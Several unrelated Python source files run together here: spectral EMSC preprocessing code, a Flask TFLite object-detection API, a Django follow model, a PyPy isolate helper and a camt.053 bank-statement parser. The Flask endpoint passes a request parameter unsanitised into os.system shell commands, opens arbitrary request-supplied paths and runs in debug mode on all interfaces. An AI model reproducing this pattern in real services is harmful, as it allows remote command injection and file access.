preprocessed_spectra = reference[:, None] + residuals / coefs[0]
# (4) return results
if return_residuals and return_coefs:
return preprocessed_spectra.T, coefs.T, residuals.T
elif return_coefs:
return preprocessed_spectra.T, coefs.T
elif return_residuals:
return preprocessed_spectra.T, residuals.T
return preprocessed_spectra.T
def _normalize_wavenumbers(wns: np.ndarray):
half_rng = np.abs(wns[0] - wns[-1]) / 2
return (wns - np.mean(wns)) / half_rng
# -----------------------------------------------------------------------------------------------
from typing import Optional, List, Union as U, Tuple as T
import copy
import numpy as np
from sklearn.decomposition import TruncatedSVD
from scipy.signal import hilbert
from scipy.interpolate import interp1d
import numexpr as ne
# from biospectools.preprocessing import EMSC
# from biospectools.preprocessing.emsc import EMSCInternals
# from biospectools.preprocessing.criterions import \
# BaseStopCriterion, TolStopCriterion, EmptyCriterionError
class MeEMSCInternals:
coefs: np.ndarray
residuals: np.ndarray
emscs: List[Optional[EMSC]]
criterions: List[BaseStopCriterion]
rmses: np.ndarray
n_iterations: np.ndarray
n_mie_components: int
def __init__(
self,
criterions: List[BaseStopCriterion],
n_mie_components: int):
self.criterions = criterions
self.n_mie_components = n_mie_components
if self.n_mie_components <= 0:
raise ValueError('n_components must be greater than 0')
self._extract_from_criterions()
def _extract_from_criterions(self):
self.emscs = []
np_arrs = [[] for _ in range(4)]
rmses, iters, coefs, resds = np_arrs
for c in self.criterions:
try:
self.emscs.append(c.best_value['emsc'])
emsc_inns: EMSCInternals = c.best_value['internals']
coefs.append(emsc_inns.coefs[0])
resds.append(emsc_inns.residuals[0])
rmses.append(c.best_score)
iters.append(c.best_iter)
except EmptyCriterionError:
self.emscs.append(None)
coefs.append(np.nan)
resds.append(np.nan)
rmses.append(np.nan)
iters.append(0)
self.rmses, self.n_iterations, self.coefs, self.residuals = \
[np.array(np.broadcast_arrays(*arr)) for arr in np_arrs]
@property
def scaling_coefs(self) -> np.ndarray:
return self.coefs[:, 0]
@property
def mie_components_coefs(self) -> np.ndarray:
assert self.n_mie_components > 0, \
'Number of mie components must be greater than zero'
return self.coefs[:, 1:1 + self.n_mie_components]
@property
def polynomial_coefs(self) -> np.ndarray:
return self.coefs[:, -1:]
class MeEMSC:
def __init__(
self,
reference: np.ndarray,
wavenumbers: np.ndarray,
n_components: Optional[int] = None,
n0s: np.ndarray = None,
radiuses: np.ndarray = None,
h: float = 0.25,
weights: np.ndarray = None,
max_iter: int = 30,
tol: float = 1e-4,
patience: int = 1,
positive_ref: bool = True,
verbose: bool = False):
self.reference = reference
self.wavenumbers = wavenumbers
self.weights = weights
self.mie_generator = MatlabMieCurvesGenerator(n0s, radiuses, h)
self.mie_decomposer = MatlabMieCurvesDecomposer(n_components)
self.stop_criterion = TolStopCriterion(max_iter, tol, patience)
self.positive_ref = positive_ref
self.verbose = verbose
def transform(self, spectra: np.ndarray, internals=False) \
-> U[np.ndarray, T[np.ndarray, MeEMSCInternals]]:
ref_x = self.reference
if self.positive_ref:
ref_x[ref_x < 0] = 0
basic_emsc = EMSC(ref_x, self.wavenumbers, rebuild_model=False)
correcteds = []
criterions = []
for spectrum in spectra:
try:
result = self._correct_spectrum(basic_emsc, ref_x, spectrum)
except np.linalg.LinAlgError:
result = np.full_like(self.wavenumbers, np.nan)
correcteds.append(result)
if internals:
criterions.append(copy.copy(self.stop_criterion))
if internals:
inns = MeEMSCInternals(criterions, self.mie_decomposer.n_components)
return np.array(correcteds), inns
return np.array(correcteds)
def _correct_spectrum(self, basic_emsc, pure_guess, spectrum):
self.stop_criterion.reset()
while not self.stop_criterion:
emsc = self._build_emsc(pure_guess, basic_emsc)
pure_guess, inn = emsc.transform(
spectrum[None], internals=True, check_correlation=False)
pure_guess = pure_guess[0]
rmse = np.sqrt(np.mean(inn.residuals ** 2))
iter_result = \
{'corrected': pure_guess, 'internals': inn, 'emsc': emsc}
self.stop_criterion.add(rmse, iter_result)
return self.stop_criterion.best_value['corrected']
def _build_emsc(self, reference, basic_emsc: EMSC) -> EMSC:
# scale with basic EMSC:
reference = basic_emsc.transform(
reference[None], check_correlation=False)[0]
if np.all(np.isnan(reference)):
raise np.linalg.LinAlgError()
if self.weights is not None:
reference *= self.weights
if self.positive_ref:
reference[reference < 0] = 0
qexts = self.mie_generator.generate(reference, self.wavenumbers)
qexts = self._orthogonalize(qexts, reference)
components = self.mie_decomposer.find_orthogonal_components(qexts)
emsc = EMSC(reference, poly_order=0, constituents=components)
return emsc
def _orthogonalize(self, qext: np.ndarray, reference: np.ndarray):
rnorm = reference / np.linalg.norm(reference)
s = np.dot(qext, rnorm)[:, None]
qext_orthogonalized = qext - s * rnorm
return qext_orthogonalized
class MatlabMieCurvesGenerator:
def __init__(self, n0s=None, rs=None, h=0.25):
self.rs = rs if rs is not None else np.linspace(2, 7.1, 10)
self.n0s = n0s if n0s is not None else np.linspace(1.1, 1.4, 10)
self.h = h
self.rs = self.rs * 1e-6
self.alpha0s = 4 * np.pi * self.rs * (self.n0s - 1)
optical_depths = 0.5 * np.pi * self.rs
fs = self.h * np.log(10) / (4 * np.pi * optical_depths)
self.gammas = fs / (self.n0s - 1)
# prepare for broadcasting (alpha, gamma, wns)
self.alpha0s = self.alpha0s[:, None, None]
self.gammas = self.gammas[None, :, None]
def generate(self, pure_absorbance, wavenumbers):
wavenumbers = wavenumbers * 100
nprs, nkks = self._get_refractive_index(pure_absorbance, wavenumbers)
qexts = self._calculate_qext_curves(nprs, nkks, wavenumbers)
return qexts
def _calculate_qext_curves(self, nprs, nkks, wavenumbers):
rho = self.alpha0s * (1 + self.gammas * nkks) * wavenumbers
tanbeta = nprs / (1 / self.gammas + nkks)
beta = np.arctan(tanbeta)
qexts = ne.evaluate(
'2 - 4 * exp(-rho * tanbeta) * cos(beta) / rho * sin(rho - beta)'
'- 4 * exp(-rho * tanbeta) * (cos(beta) / rho) ** 2 * cos(rho - 2 * beta)'
'+ 4 * (cos(beta) / rho) ** 2 * cos(2 * beta)')
return qexts.reshape(-1, len(wavenumbers))
def _get_refractive_index(self, pure_absorbance, wavenumbers):
pad_size = 200
# Extend absorbance spectrum
wns_ext = self._extrapolate_wns(wavenumbers, pad_size)
pure_ext = np.pad(pure_absorbance, pad_size, mode='edge')
# Calculate refractive index
nprs_ext = pure_ext / wns_ext
nkks_ext = hilbert(nprs_ext).imag
if wns_ext[0] < wns_ext[1]:
nkks_ext *= -1
nprs = nprs_ext[pad_size:-pad_size]
nkks = nkks_ext[pad_size:-pad_size]
return nprs, nkks
def _extrapolate_wns(self, wns, pad_size):
f = interp1d(np.arange(len(wns)), wns, fill_value='extrapolate')
idxs_ext = np.arange(-pad_size, len(wns) + pad_size)
wns_ext = f(idxs_ext)
return wns_ext
class MatlabMieCurvesDecomposer:
def __init__(self, n_components: Optional[int]):
self.n_components = n_components
self.svd = TruncatedSVD(self.n_components, n_iter=7)
self.max_components = 30
self.explained_thresh = 99.96
def find_orthogonal_components(self, qexts: np.ndarray):
if self.n_components is None:
self.n_components = self._estimate_n_components(qexts)
self.svd.n_components = self.n_components
# do not refit svd, since it was fitted during _estimation
return self.svd.components_[:self.n_components]
self.svd.fit(qexts)
return self.svd.components_
def _estimate_n_components(self, qexts: np.ndarray):
self.svd.n_components = min(self.max_components, qexts.shape[-1] - 1)
self.svd.fit(qexts)
# svd.explained_variance_ is not used since
# it is not consistent with matlab code
lda = self.svd.singular_values_ ** 2
explained_var = np.cumsum(lda / np.sum(lda)) * 100
n_comp = np.argmax(explained_var > self.explained_thresh) + 1
return n_comp
# ----------------------------------------------------------------------------------------------------------
def savitzky_golay_filter(y, window_size, order, deriv=0, rate=1):
"""
Based on this : https://scipy.github.io/old-wiki/pages/Cookbook/SavitzkyGolay
Parameters
----------
y : array_like, shape (N,)
the values of the time history of the signal.
window_size : int
the length of the window. Must be an odd integer number.
order : int
the order of the polynomial used in the filtering.
Must be less then `window_size` - 1.
deriv: int
the order of the derivative to compute (default = 0 means only smoothi
Returns
-------
ys : ndarray, shape (N)
the smoothed signal (or it's n-th derivative).
Notes
-----
The Savitzky-Golay is a type of low-pass filter, particularly
suited for smoothing noisy data. The main idea behind this
approach is to make for each point a least-square fit with a
polynomial of high order over a odd-sized window centered at
the point.
Examples
--------
t = np.linspace(-4, 4, 500)
y = np.exp( -t**2 ) + np.random.normal(0, 0.05, t.shape)
ysg = savitzky_golay(y, window_size=31, order=4)
import matplotlib.pyplot as plt
plt.plot(t, y, label='Noisy signal')
plt.plot(t, np.exp(-t**2), 'k', lw=1.5, label='Original signal')
plt.plot(t, ysg, 'r', label='Filtered signal')
plt.legend()
plt.show()
References
----------
.. [1] A. Savitzky, M. J. E. Golay, Smoothing and Differentiation of
Data by Simplified Least Squares Procedures. Analytical
Chemistry, 1964, 36 (8), pp 1627-1639.
.. [2] Numerical Recipes 3rd Edition: The Art of Scientific Computing
W.H. Press, S.A. Teukolsky, W.T. Vetterling, B.P. Flannery
Cambridge University Press ISBN-13: 9780521880688
"""
import numpy as np
from math import factorial
# TODO:
# import jax
# import jax.numpy as jnp
try:
window_size = np.abs(np.int(window_size))
order = np.abs(np.int(order))
except ValueError:
raise ValueError("window_size and order have to be of type int")
if window_size % 2 != 1 or window_size < 1:
raise TypeError("window_size size must be a positive odd number")
if window_size < order + 2:
raise TypeError("window_size is too small for the polynomials order")
order_range = range(order + 1)
half_window = (window_size - 1) // 2
# precompute coefficients
b = np.mat([[k ** i for i in order_range] for k in range(-half_window, half_window + 1)])
m = np.linalg.pinv(b).A[deriv] * rate ** deriv * factorial(deriv)
# pad the signal at the extremes with
# values taken from the signal itself
firstvals = y[0] - np.abs(y[1:half_window + 1][::-1] - y[0])
lastvals = y[-1] + np.abs(y[-half_window - 1:-1][::-1] - y[-1])
y = np.concatenate((firstvals, y, lastvals))
return np.convolve(m[::-1], y, mode='valid')
def savitzky_golay(y, window_size, order, deriv=0, rate=1, array=True):
# def savitzky_golay(y, window_size, order, deriv=0, rate=1):
"""
"""
if array == True:
return np.array([savitzky_golay_filter(xi, window_size, order, deriv=0, rate=1) for xi in y])
else:
return savitzky_golay_filter(y, window_size, order, deriv=0, rate=1)
|
# Lint as: python3
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Example using TFLite to detect objects in a given image datasets."""
from PIL import Image
from PIL import ImageDraw
import os
import detect
import tflite_runtime.interpreter as tflite
import platform
import datetime
import cv2
import time
import numpy as np
import io
from io import BytesIO
from flask import Flask, request, Response, jsonify
import random
import re
confThreshold = 0.5
app = Flask(__name__)
def load_labels(path, encoding='utf-8'):
"""Loads labels from file (with or without index numbers).
Args:
path: path to label file.
encoding: label file encoding.
Returns:
Dictionary mapping indices to labels.
"""
with open(path, 'r', encoding=encoding) as f:
lines = f.readlines()
if not lines:
return {}
if lines[0].split(' ', maxsplit=1)[0].isdigit():
pairs = [line.split(' ', maxsplit=1) for line in lines]
return {int(index): label.strip() for index, label in pairs}
else:
return {index: line.strip() for index, line in enumerate(lines)}
def make_interpreter(model_file):
return tflite.Interpreter(model_path=model_file)
def draw_objects(draw, objs, labels):
"""Draws the bounding box and label for each object."""
for obj in objs:
bbox = obj.bbox
rgbl=[255,0,0]
random.shuffle(rgbl)
color=tuple(rgbl)
draw.rectangle([(bbox.xmin, bbox.ymin), (bbox.xmax, bbox.ymax)],
outline=color)
draw.text((bbox.xmin + 10, bbox.ymin + 10),
'%s\n%.2f' % (labels.get(obj.id, obj.id), obj.score),
fill=color)
def detection_loop(filename_image, path, output):
labels = load_labels(labelsPath) if labelsPath else {}
interpreter = make_interpreter(modelPath)
interpreter.allocate_tensors()
summ = 0
#check if folder results exists, otherwise make it and make it accessible
if (os.path.isdir(path+'results') == False):
#print("The output folder " + output + " does not exist! It will be created")
os.system("mkdir " + path + "results")
#os.system("sudo chmod 777 ./results")
#make output.txt for results of the inference and make it accessible
os.system("touch "+ path + "results/output.txt")
#os.system("sudo chmod 777 ./results/output.txt")
no_files = len(filename_image)
for filename, image in filename_image.items():
#image = cv2.cvtColor(img,cv2.COLOR_BGR2RGB)
#image = Image.fromarray(image)
scale = detect.set_input(interpreter, image.size, lambda size: image.resize(size, Image.ANTIALIAS))
for _ in range(1):
start = time.perf_counter()
#run inference by invoking the Interpreter
interpreter.invoke()
#calculate inference time
inference_time = time.perf_counter() - start
#get the output data
objs = detect.get_output(interpreter,confThreshold,scale)
print('\n\nIT TOOK %.2f ms' % (inference_time * 1000) + " on image " + filename + "\n")
summ=summ+(inference_time * 1000)
#os.chmod("./results/output.txt", 0o777)
with open (path+"results/output.txt", "a") as f:
f.write(
"%f \n" % (inference_time * 1000)
)
print ('--------RESULTS--------')
if not objs:
#with open (path+"results/output.txt", "a") as f:
# f.write("No objects detected"
# )
print('No objects detected')
for obj in objs:
#with open (path+"results/output.txt", "a") as f:
# f.write(
# labels.get(obj.id, obj.id) +
# "\n score: %s\n--\n" % obj.score
# )
print(labels.get(obj.id, obj.id))
#print(' id: ', obj.id)
print(' score: ', obj.score)
#print(' bbox: ', obj.bbox)
#if output != None:
# image = image.convert('RGB')
# draw_objects(ImageDraw.Draw(image), objs, labels)
#image=cv2.cvtColor(image,cv2.COLOR_BGR2RGB)
#np_img = Image.fromarray(image)
#byte_io = BytesIO()
#os.system("sudo chmod 777 ./results")
#spliting filename from extension
# split_filename = filename.split(".", 1)
# image.save(path+"results/"+split_filename[0]+"-annnotated.png", format='PNG')
print("The average inference time over "+str(no_files)+" image files is:")
print ('%.7fms' % (summ / no_files))
# print ('%.7f' % (summ / 100))
labelsPath = "models/coco_labels.txt"
modelPath = "models/mobilenet_ssd_v2_coco_quant_postprocess.tflite"
#initializing the flask app
app = Flask(__name__)
#routing http posts to this method
@app.route('/api/detect', methods=['POST', 'GET'])
def main():
#img = request.files["image"].read()
#image = Image.open(io.BytesIO(img))
#data_input = request.args['input']
data_input = request.values.get('input')
output = request.values.get('output')
#output = request.form.get('output')
path = data_input
filename_image = {}
input_format = ["jpg", "png", "jpeg"]
if data_input.find(".") != -1:
print(data_input + " is a file")
split_data_input = data_input.split(".", 1)
if data_input.endswith(tuple(input_format)):
print("INPUT FORMAT: %s IS VALID" % split_data_input[1])
path_splitted = []
path_splitted = re.split('/', data_input)
filename = path_splitted[len(path_splitted)-1]
filename_image[filename] = Image.open(data_input)
path = os.path.dirname(data_input)+"/"
else:
print(data_input + " is a path with the following files: ")
for filename in os.listdir(data_input):
image_path = data_input + filename
filename_image[filename] = Image.open(image_path)
print(" " + filename)
detection_loop(filename_image, path, output)
status_code = Response(status = 200)
return status_code
# image=cv2.imread(args.input)
# image=cv2.cvtColor(image,cv2.COLOR_BGR2RGB)
if __name__ == '__main__':
app.run(debug = True, host = '0.0.0.0')
|
from django.db import models
from django.contrib.auth import get_user_model
# Create your models here.
User = get_user_model()
class Follow(models.Model):
from_user = models.ForeignKey(User,
on_delete=models.CASCADE,
related_name="following")
to_user = models.ForeignKey(User,
on_delete=models.CASCADE,
related_name="followers")
status = models.BooleanField(default=True)
def __str__(self):
return f"{self.from_user} => {self.to_user}"
|
import exceptions, os
from pypy.tool import slaveproc
class IsolateException(Exception):
pass
class IsolateInvoker(object):
# to have a nice repr
def __init__(self, isolate, name):
self.isolate = isolate
self.name = name
def __call__(self, *args):
return self.isolate._invoke(self.name, args)
def __repr__(self):
return "<invoker for %r . %r>" % (self.isolate.module, self.name)
def close_isolate(self):
self.isolate._close()
class Isolate(object):
"""
Isolate lets load a module in a different process,
and support invoking functions from it passing and
returning simple values
module: a dotted module name or a tuple (directory, module-name)
"""
_closed = False
def __init__(self, module):
self.module = module
self.slave = slaveproc.SlaveProcess(os.path.join(os.path.dirname(__file__),
'isolate_slave.py'))
res = self.slave.cmd(('load', module))
assert res == 'loaded'
def __getattr__(self, name):
return IsolateInvoker(self, name)
def _invoke(self, func, args):
status, value = self.slave.cmd(('invoke', (func, args)))
print 'OK'
if status == 'ok':
return value
else:
exc_type_module, exc_type_name = value
if exc_type_module == 'exceptions':
raise getattr(exceptions, exc_type_name)
else:
raise IsolateException, "%s.%s" % value
def _close(self):
if not self._closed:
self.slave.close()
self._closed = True
def __del__(self):
self._close()
def close_isolate(isolate):
assert isinstance(isolate, Isolate)
isolate._close()
|
from datetime import datetime, date
from decimal import Decimal
from typing import Tuple, Any, Optional, Dict
from django.conf import settings
from django.core.exceptions import ValidationError
from django.db import transaction
from django.utils.dateparse import parse_date
from django.utils.translation import gettext as _
from jacc.models import Account, EntryType
from jutil.format import dec2, dec4
from jutil.parse import parse_datetime
from jbank.models import (
StatementFile,
Statement,
StatementRecord,
DELIVERY_FROM_BANK_SYSTEM,
StatementRecordDetail,
CurrencyExchange,
StatementRecordRemittanceInfo,
CurrencyExchangeSource,
)
from jbank.parsers import parse_filename_suffix
from jutil.xml import xml_to_dict
CAMT053_STATEMENT_SUFFIXES = ("XML", "XT", "CAMT", "NDCAMT53L")
CAMT053_ARRAY_TAGS = ["Bal", "Ntry", "NtryDtls", "TxDtls", "Strd"]
CAMT053_INT_TAGS = ["NbOfNtries", "NbOfTxs"]
def camt053_get_iban(data: dict) -> str:
return data.get("BkToCstmrStmt", {}).get("Stmt", {}).get("Acct", {}).get("Id", {}).get("IBAN", "")
def camt053_get_val(data: dict, key: str, default: Any = None, required: bool = True, name: str = "") -> Any:
if key not in data:
if required:
raise ValidationError(_("camt.053 field {} missing").format(name if name else key))
return default
return data[key]
def camt053_get_str(data: dict, key: str, default: str = "", required: bool = True, name: str = "") -> str:
return str(camt053_get_val(data, key, default, required, name))
def camt053_get_currency(data: dict, key: str, required: bool = True, name: str = "") -> Tuple[Optional[Decimal], str]:
try:
v = camt053_get_val(data, key, default=None, required=False, name=name)
if v is not None:
amount = dec2(v["@"])
currency_code = v["@Ccy"]
return amount, currency_code
except Exception:
pass
if required:
raise ValidationError(_("camt.053 field {} type {} missing or invalid").format(name, "currency"))
return None, ""
def camt053_get_dt(data: Dict[str, Any], key: str, name: str = "") -> datetime:
s = camt053_get_val(data, key, None, True, name)
val = parse_datetime(s)
if val is None:
raise ValidationError(_("camt.053 field {} type {} missing or invalid").format(name, "datetime") + ": {}".format(s))
return val
def camt053_get_int(data: Dict[str, Any], key: str, name: str = "") -> int:
s = camt053_get_val(data, key, None, True, name)
try:
return int(s)
except Exception:
pass
raise ValidationError(_("camt.053 field {} type {} missing or invalid").format(name, "int"))
def camt053_get_int_or_none(data: Dict[str, Any], key: str, name: str = "") -> Optional[int]:
s = camt053_get_val(data, key, None, False, name)
if s is None:
return None
try:
return int(s)
except Exception:
pass
raise ValidationError(_("camt.053 field {} type {} missing or invalid").format(name, "int"))
def camt053_get_date(data: dict, key: str, default: Optional[date] = None, required: bool = True, name: str = "") -> date:
s = camt053_get_val(data, key, default, required, name)
try:
val = parse_date(s[:10])
if val is None:
raise ValidationError(_("camt.053 field {} type {} missing or invalid").format(name, "date"))
assert isinstance(val, date)
return val
except Exception:
pass
raise ValidationError(_("camt.053 field {} type {} missing or invalid").format(name, "date") + ": {}".format(s))
def camt053_parse_statement_from_file(filename: str) -> dict:
if parse_filename_suffix(filename).upper() not in CAMT053_STATEMENT_SUFFIXES:
raise ValidationError(
_('File {filename} has unrecognized ({suffixes}) suffix for file type "{file_type}"').format(
filename=filename, suffixes=", ".join(CAMT053_STATEMENT_SUFFIXES), file_type="camt.053"
)
)
with open(filename, "rb") as fp:
data = xml_to_dict(fp.read(), array_tags=CAMT053_ARRAY_TAGS, int_tags=CAMT053_INT_TAGS)
return data
def camt053_get_stmt_bal(d_stmt: dict, bal_type: str) -> Tuple[Decimal, Optional[date]]:
for bal in d_stmt.get("Bal", []):
if bal.get("Tp", {}).get("CdOrPrtry", {}).get("Cd", "") == bal_type:
amt = Decimal(bal.get("Amt", {}).get("@", ""))
dt_data = bal.get("Dt", {})
dt = None
if "Dt" in dt_data:
dt = camt053_get_date(dt_data, "Dt", name="Stmt.Bal[{}].Dt.Dt".format(bal_type))
return amt, dt
raise ValidationError(_("camt.053 field {} type {} missing or invalid").format("Stmt.Bal.Tp.CdOrPrty.Cd", bal_type))
def camt053_domain_from_record_code(record_domain: str) -> str:
if record_domain == "PMNT":
return "700"
if record_domain == "LDAS":
return "761"
return ""
def camt053_get_unified_val(qs, k: str, default: Any) -> Any:
v = default
for e in qs:
v2 = getattr(e, k)
if v == default:
v = v2
elif v and v2 and v2 != v:
return default
return v
def camt053_get_unified_str(qs, k: str) -> str:
return camt053_get_unified_val(qs, k, "")
@transaction.atomic # noqa
def camt053_create_statement(statement_data: dict, name: str, file: StatementFile, **kw) -> Statement: # noqa
"""
Creates camt.053 Statement from statement data parsed by camt053_parse_statement_from_file()
:param statement_data: XML data in form of dict
:param name: File name of the account statement
:param file: Source statement file
:return: Statement
"""
account_number = camt053_get_iban(statement_data)
if not account_number:
raise ValidationError("{name}: ".format(name=name) + _("account.not.found").format(account_number=""))
accounts = list(Account.objects.filter(name=account_number))
if len(accounts) != 1:
raise ValidationError("{name}: ".format(name=name) + _("account.not.found").format(account_number=account_number))
account = accounts[0]
assert isinstance(account, Account)
d_stmt = statement_data.get("BkToCstmrStmt", {}).get("Stmt", {})
if not d_stmt:
raise ValidationError(_("camt.053 field {} type {} missing or invalid").format("Stmt", "element"))
d_acct = d_stmt.get("Acct", {})
d_ownr = d_acct.get("Ownr", {})
d_ntry = d_stmt.get("Ntry", [])
d_frto = d_stmt.get("FrToDt", {})
d_txsummary = d_stmt.get("TxsSummry", {})
if Statement.objects.filter(name=name, account=account).first():
raise ValidationError("Bank account {} statement {} of processed already".format(account_number, name))
stm = Statement(name=name, account=account, file=file)
stm.account_number = stm.iban = account_number
stm.bic = camt053_get_str(d_acct.get("Svcr", {}).get("FinInstnId", {}), "BIC", name="Stmt.Acct.Svcr.FinInstnId.BIC")
stm.statement_identifier = camt053_get_str(d_stmt, "Id", name="Stmt.Id")
stm.statement_number = camt053_get_str(d_stmt, "LglSeqNb", name="Stmt.LglSeqNb")
stm.record_date = camt053_get_dt(d_stmt, "CreDtTm", name="Stmt.CreDtTm")
stm.begin_date = camt053_get_dt(d_frto, "FrDtTm", name="Stmt.FrDtTm").date()
stm.end_date = camt053_get_dt(d_frto, "ToDtTm", name="Stmt.ToDtTm").date()
stm.currency_code = camt053_get_str(d_acct, "Ccy", name="Stmt.Acct.Ccy")
if stm.currency_code != account.currency:
raise ValidationError(
_(
"Account currency {account_currency} does not match statement entry currency {statement_currency}".format(
statement_currency=stm.currency_code, account_currency=account.currency
)
)
)
stm.owner_name = camt053_get_str(d_ownr, "Nm", name="Stm.Acct.Ownr.Nm")
stm.begin_balance, stm.begin_balance_date = camt053_get_stmt_bal(d_stmt, "OPBD")
if stm.begin_balance_date is None:
stm.begin_balance_date = stm.begin_date
stm.record_count = camt053_get_int_or_none(d_txsummary.get("TtlNtries", {}), "NbOfNtries", name="Stmt.TxsSummry.TtlNtries.NbOfNtries") or 0
stm.bank_specific_info_1 = camt053_get_str(d_stmt, "AddtlStmtInf", required=False)[:1024]
for k, v in kw.items():
setattr(stm, k, v)
stm.full_clean()
stm.save()
e_deposit = EntryType.objects.filter(code=settings.E_BANK_DEPOSIT).first()
if not e_deposit:
raise ValidationError(_("entry.type.missing") + " ({}): {}".format("settings.E_BANK_DEPOSIT", settings.E_BANK_DEPOSIT))
assert isinstance(e_deposit, EntryType)
e_withdraw = EntryType.objects.filter(code=settings.E_BANK_WITHDRAW).first()
if not e_withdraw:
raise ValidationError(_("entry.type.missing") + " ({}): {}".format("settings.E_BANK_WITHDRAW", settings.E_BANK_WITHDRAW))
assert isinstance(e_withdraw, EntryType)
e_types = {
"CRDT": e_deposit,
"DBIT": e_withdraw,
}
record_type_map = {
"CRDT": "1",
"DBIT": "2",
}
for ntry in d_ntry:
archive_id = ntry.get("AcctSvcrRef", "")
amount, cur = camt053_get_currency(ntry, "Amt", name="Stmt.Ntry[{}].Amt".format(archive_id))
if cur != account.currency:
raise ValidationError(
_(
"Account currency {account_currency} does not match statement entry currency {statement_currency}".format(
statement_currency=cur, account_currency=account.currency
)
)
)
cdt_dbt_ind = ntry["CdtDbtInd"]
e_type = e_types.get(cdt_dbt_ind, None)
if not e_type:
raise ValidationError(_("Statement entry type {} not supported").format(cdt_dbt_ind))
rec = StatementRecord(statement=stm, account=account, type=e_type)
rec.amount = amount
rec.archive_identifier = archive_id
rec.entry_type = record_type_map[cdt_dbt_ind]
rec.record_date = record_date = camt053_get_date(ntry.get("BookgDt", {}), "Dt", name="Stmt.Ntry[{}].BkkgDt.Dt".format(archive_id))
rec.value_date = camt053_get_date(ntry.get("ValDt", {}), "Dt", name="Stmt.Ntry[{}].ValDt.Dt".format(archive_id))
rec.delivery_method = DELIVERY_FROM_BANK_SYSTEM
d_bktxcd = ntry.get("BkTxCd", {})
d_domn = d_bktxcd.get("Domn", {})
d_family = d_domn.get("Fmly", {})
d_prtry = d_bktxcd.get("Prtry", {})
rec.record_domain = record_domain = camt053_get_str(d_domn, "Cd", name="Stmt.Ntry[{}].BkTxCd.Domn.Cd".format(archive_id))
rec.record_code = camt053_domain_from_record_code(record_domain)
rec.family_code = camt053_get_str(d_family, "Cd", name="Stmt.Ntry[{}].BkTxCd.Domn.Family.Cd".format(archive_id))
rec.sub_family_code = camt053_get_str(d_family, "SubFmlyCd", name="Stmt.Ntry[{}].BkTxCd.Domn.Family.SubFmlyCd".format(archive_id))
rec.record_description = camt053_get_str(d_prtry, "Cd", required=False)
rec.full_clean()
rec.save()
for dtl_batch in ntry.get("NtryDtls", []):
batch_identifier = dtl_batch.get("Btch", {}).get("MsgId", "")
dtl_ix = 0
for dtl in dtl_batch.get("TxDtls", []):
d = StatementRecordDetail(record=rec, batch_identifier=batch_identifier)
d_amt_dtl = dtl.get("AmtDtls", {})
d_txamt = d_amt_dtl.get("TxAmt", {})
d_xchg = d_txamt.get("CcyXchg", None)
d.amount, d.currency_code = camt053_get_currency(d_txamt, "Amt", required=False)
d.instructed_amount, source_currency = camt053_get_currency(d_amt_dtl.get("InstdAmt", {}), "Amt", required=False)
if (not d_xchg and source_currency and source_currency != d.currency_code) or (d_xchg and not source_currency):
raise ValidationError(_("Inconsistent Stmt.Ntry[{}].NtryDtls.TxDtls[{}].AmtDtls".format(archive_id, dtl_ix)))
if source_currency and source_currency != d.currency_code:
source_currency = camt053_get_str(d_xchg, "SrcCcy", default=source_currency, required=False)
target_currency = camt053_get_str(d_xchg, "TrgCcy", default=d.currency_code, required=False)
unit_currency = camt053_get_str(d_xchg, "UnitCcy", default="", required=False)
exchange_rate_str = camt053_get_str(d_xchg, "XchgRate", default="", required=False)
exchange_rate = dec4(exchange_rate_str) if exchange_rate_str else None
exchange_source = CurrencyExchangeSource.objects.get_or_create(name=account_number)[0]
d.exchange = CurrencyExchange.objects.get_or_create(
record_date=record_date,
source_currency=source_currency,
target_currency=target_currency,
unit_currency=unit_currency,
exchange_rate=exchange_rate,
source=exchange_source,
)[0]
d_refs = dtl.get("Refs", {})
d.archive_identifier = d_refs.get("AcctSvcrRef", "")
d.end_to_end_identifier = d_refs.get("EndToEndId", "")
d_parties = dtl.get("RltdPties", {})
d_dbt = d_parties.get("Dbtr", {})
d.debtor_name = d_dbt.get("Nm", "")
d_udbt = d_parties.get("UltmtDbtr", {})
d.ultimate_debtor_name = d_udbt.get("Nm", "")
d_cdtr = d_parties.get("Cdtr", {})
d.creditor_name = d_cdtr.get("Nm", "")
d_cdtr_acct = d_parties.get("CdtrAcct", {})
d_cdtr_acct_id = d_cdtr_acct.get("Id", {})
d.creditor_account = d_cdtr_acct_id.get("IBAN", "")
if d.creditor_account:
d.creditor_account_scheme = "IBAN"
else:
d_cdtr_acct_id_othr = d_cdtr_acct_id.get("Othr") or {}
d.creditor_account_scheme = d_cdtr_acct_id_othr.get("SchmeNm", {}).get("Cd", "")
d.creditor_account = d_cdtr_acct_id_othr.get("Id") or ""
d_rmt = dtl.get("RmtInf", {})
d.unstructured_remittance_info = d_rmt.get("Ustrd", "")
d_rltd_dts = dtl.get("RltdDts", {})
d.paid_date = camt053_get_dt(d_rltd_dts, "AccptncDtTm") if "AccptncDtTm" in d_rltd_dts else None
d.full_clean()
d.save()
st = StatementRecordRemittanceInfo(detail=d)
for strd in d_rmt.get("Strd", []):
additional_info = strd.get("AddtlRmtInf", "")
has_additional_info = bool(additional_info and st.additional_info)
amount, currency_code = camt053_get_currency(strd.get("RfrdDocAmt", {}), "RmtdAmt", required=False)
has_amount = bool(amount and st.amount)
reference = strd.get("CdtrRefInf", {}).get("Ref", "")
has_reference = bool(reference and st.reference)
# check if new remittance info record is needed
if has_additional_info or has_amount or has_reference:
st = StatementRecordRemittanceInfo(detail=d)
if additional_info:
st.additional_info = additional_info
if amount:
st.amount, st.currency_code = amount, currency_code
if reference:
st.reference = reference
st.full_clean()
st.save()
dtl_ix += 1
# fill record name from details
assert rec.type
if not rec.name:
if rec.type.code == e_withdraw.code:
rec.name = camt053_get_unified_str(rec.detail_set.all(), "creditor_name")
elif rec.type.code == e_deposit.code:
rec.name = camt053_get_unified_str(rec.detail_set.all(), "debtor_name")
if not rec.recipient_account_number:
rec.recipient_account_number = camt053_get_unified_str(rec.detail_set.all(), "creditor_account")
if not rec.remittance_info:
rec.remittance_info = camt053_get_unified_str(StatementRecordRemittanceInfo.objects.all().filter(detail__record=rec), "reference")
if not rec.paid_date:
paid_date = camt053_get_unified_val(rec.detail_set.all(), "paid_date", default=None)
if paid_date:
